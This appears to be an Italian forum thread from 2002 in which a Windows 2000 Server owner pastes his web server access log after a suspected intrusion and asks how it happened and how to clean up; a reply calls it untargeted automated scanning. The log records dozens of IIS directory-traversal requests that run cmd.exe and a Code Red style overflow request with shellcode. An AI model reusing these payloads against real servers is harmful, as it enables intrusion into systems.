ciao,
penso di essere stato attacato da qualche hacker.
Controllando il mio file di log: access.log mi sono accorto che sono entrati attraverso una falla del Web Server Extensions del Front Page.
Ho messo in fondo a questa e-mail uno stralcio del mio file access.log
Qualcuno di voi sa cosa è successo? Come ha fatto?
Inoltre il tipo ha creato delle cartelle _vti_bin ;_vti_cnf ...
di cui non ho alcun controllo (non riesco ne a rinominarle, ne a cancellarle).
Sapete dirmi cosa devo fare per fare pulizia?
Quale programma di antivirus, firewall, ... mi consigliate di usare per proteggere il mio computer da latri attacchi hacker?
Vi ringrazio anticipatamente
Salvo
P.S.
Il mio sistema operativo è NT2000 Server
P.P.S.
193.251.158.5 non sono io
Access.log:
210.201.31.226 - - [07/Mar/2002:20:34:17 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 500 536
210.201.31.226 - - [07/Mar/2002:20:35:16 +0100] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 500 536
218.24.130.154 - - [07/Mar/2002:21:08:33 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252
193.251.158.5 - - [08/Mar/2002:02:27:43 +0100] "GET /scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:43 +0100] "GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 234
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 233
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 234
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 248
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 231
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 231
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /cgi-bin/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /cgi-bin/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /cgi-bin/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /cgi-bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 403 235
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 231
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 231
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 232
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 233
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 235
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 234
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 247
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET / HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:49 +0100] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:49 +0100] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:49 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524

Rispondi quotando
. Probabilmente son exploit che scandagliano range di IP, forse non era mirato a te, ma al malcapitato di turno col s.o. bacato...
